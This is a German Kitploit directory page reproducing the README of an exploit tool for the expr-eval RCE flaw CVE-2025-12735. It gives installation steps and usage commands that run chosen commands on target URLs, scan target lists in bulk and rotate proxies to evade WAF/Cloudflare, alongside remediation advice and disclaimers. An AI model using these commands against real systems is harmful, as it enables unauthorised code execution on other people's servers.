Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-12735-expr-eval-rce — Sicherheitsforschungstool zur Erkennung und zum Testen von CVE-2025-12735 (expr-eval RCE-Sicherheitslücke) | Kitploit
Tools/GitHubGitHub/alnashawatirohwederb2167-max/cve-2025-12735-expr-eval-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubalnashawatirohwederb2167-max/cve-2025-12735-expr-eval-rce

cve-2025-12735-expr-eval-rce

Sicherheitsforschungstool zur Erkennung und zum Testen von CVE-2025-12735 (expr-eval RCE-Sicherheitslücke)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
13vor 9 MonatenNoch nicht geprüft
Teilen

CVE-2025-12735 expr-eval RCE Exploit

Ein Sicherheitsforschungswerkzeug zur Erkennung und Prüfung der CVE-2025-12735-Sicherheitslücke in den npm-Paketen expr-eval und expr-eval-fork.

⚠️ Haftungsausschluss

Dieses Tool ist nur für autorisierte Sicherheitstests und zu Bildungszwecken bestimmt. Unautorisierter Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.

📋 Überblick

CVE-2025-12735 ist eine kritische Sicherheitslücke zur Remote-Code-Ausführung (RCE) in den npm-Paketen expr-eval und expr-eval-fork. Diese Sicherheitslücke ermöglicht es Angreifern, beliebige Funktionen innerhalb des vom Parser verwendeten context-Objekts zu definieren, sodass bösartiger Code injiziert werden kann, der systemweite Befehle ausführt.

CVSS-Score: 9.8 (Kritisch) expr-eval-fork < 3.0.0 expr-eval-fork v3.0.0+


Betroffene Versionen:

Behobene Version:

🔍 Funktionen

  • Automatische Erkennung: Scannt JavaScript-Dateien auf die Nutzung der expr-eval-Bibliothek
  • Endpunkterkennung: Findet automatisch Evaluierungsendpunkte
  • Sicherheitstest: Testet auf die CVE-2025-12735-Sicherheitslücke
  • Befehlsausführung: Demonstriert RCE-Fähigkeit (nur für autorisierte Tests)
  • Multithreading-Unterstützung: Scannt mehrere Ziele parallel
  • Proxy-Unterstützung: Umgeht WAF/Cloudflare-Beschränkungen
  • JSON-Export: Detaillierte Ergebnisse im JSON-Format

📦 Installation

Voraussetzungen

  • Python 3.6 oder höher
  • pip (Python-Paketmanager)

Schnellinstallation

root@kitploit:~
# Repository klonen
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce

# Abhängigkeiten installieren
pip install -r requirements.txt

# Skript ausführbar machen (optional)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py

Alternative: Direkter Download

root@kitploit:~
# Skript herunterladen
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py

# Abhängigkeiten installieren
pip install requests

🚀 Verwendung

Grundlegende Verwendung

root@kitploit:~
# Einzelnes Ziel
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com

# Benutzerdefinierten Befehl ausführen
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"

# Mehrere Ziele aus Datei
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

# Mit Threading für schnelleres Scannen
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5

# Ausführliche Ausgabe für Debugging
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v

Verwendung von Proxys

root@kitploit:~
# Einzelner Proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port

# Mehrere Proxys aus Datei
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

Befehlszeilenoptionen

root@kitploit:~
-u, --url          Ziel-URL
-f, --file         Datei mit Ziel-URLs (eine pro Zeile)
-c, --command      Auszuführender Befehl (Standard: id)
-t, --threads      Anzahl der Threads (Standard: 1)
-o, --output       Ausgabedatei (Standard: uknf_expr_eval_results.json)
-v, --verbose      Ausführliche Protokollierung aktivieren
--proxy            Proxy-URL (z.B. http://127.0.0.1:8080)
--proxy-list       Datei mit Proxy-URLs (eine pro Zeile)

📊 Ausgabe

Das Skript generiert eine JSON-Datei mit detaillierten Ergebnissen:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:35:32.638109",
  "expr_eval_detected": true,
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/api/evaluate"
}

🔬 Funktionsweise

  1. Erkennungsphase: Scannt JavaScript-Dateien und HTML-Inhalte auf Verweise auf expr-eval
  2. Endpunkterkennung: Testet gängige API-Endpunkte, die expr-eval verwenden könnten
  3. Sicherheitstest: Versucht, beliebige Funktionen im context-Objekt zu injizieren
  4. Ausnutzung: Demonstriert bei Anfälligkeit die RCE-Fähigkeit

🛡️ Abhilfe

Wenn Sie expr-eval oder expr-eval-fork verwenden:

  1. Sofort aktualisieren:

    root@kitploit:~
    npm install expr-eval-fork@latest
    
  2. Sicherheitspatch anwenden:

    • Wenden Sie den Pull Request #288 auf expr-eval an
    • Oder wechseln Sie zu expr-eval-fork v3.0.0+
  3. Eingabevalidierung implementieren:

    • Alle Benutzereingaben bereinigen
    • Funktions-Whitelist verwenden
    • Kontextobjekte validieren

📚 Referenzen

  • CVE: CVE-2025-12735
  • CERT: VU#263614
  • GitHub Advisory: GHSA-jc85-fpwf-qm7x
  • Sicherheitspatch: PR #288

📖 Beispiele

Beispiel 1: Einzelner Zielscan

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com

Beispiel 2: Mehrere Ziele mit Ausgabe

root@kitploit:~
# Ziele-Datei erstellen
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Scan ausführen
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

Beispiel 3: Benutzerdefinierte Befehlsausführung

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"

Beispiel 4: Verwendung von Proxys

root@kitploit:~
# Einzelner Proxy
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080

# Mehrere Proxys aus Datei
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

🤝 Beitrag

Beiträge sind willkommen! Bitte reichen Sie einen Pull Request ein.

  1. Forken Sie das Repository
  2. Erstellen Sie Ihren Feature-Branch (git checkout -b feature/AmazingFeature)
  3. Committen Sie Ihre Änderungen (git commit -m 'Add some AmazingFeature')
  4. Pushen Sie den Branch (git push origin feature/AmazingFeature)
  5. Öffnen Sie einen Pull Request

🐛 Probleme

Wenn Sie auf Probleme stoßen oder Vorschläge haben, öffnen Sie bitte ein Issue auf GitHub.

📝 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE-Datei für Details.

⭐ Stern-Verlauf

Wenn Sie dieses Tool nützlich finden, ziehen Sie bitte in Betracht, ihm auf GitHub einen Stern zu geben!

⚖️ Rechtliches

Dieses Tool wird nur für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden. Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen die entsprechende Autorisierung haben.

🙏 Danksagungen

  • Ursprünglicher Sicherheitsforscher: Jangwoo Choe (UKO)
  • CERT Coordination Center für die Offenlegung der Sicherheitslücke
  • GitHub Security und npm für Sicherheitswarnungen

💰 Spenden

Wenn Sie dieses Tool nützlich finden und das Projekt unterstützen möchten:

Bitcoin (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

Ethereum (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

Vielen Dank für Ihre Unterstützung! 🙏

Tool herunterladen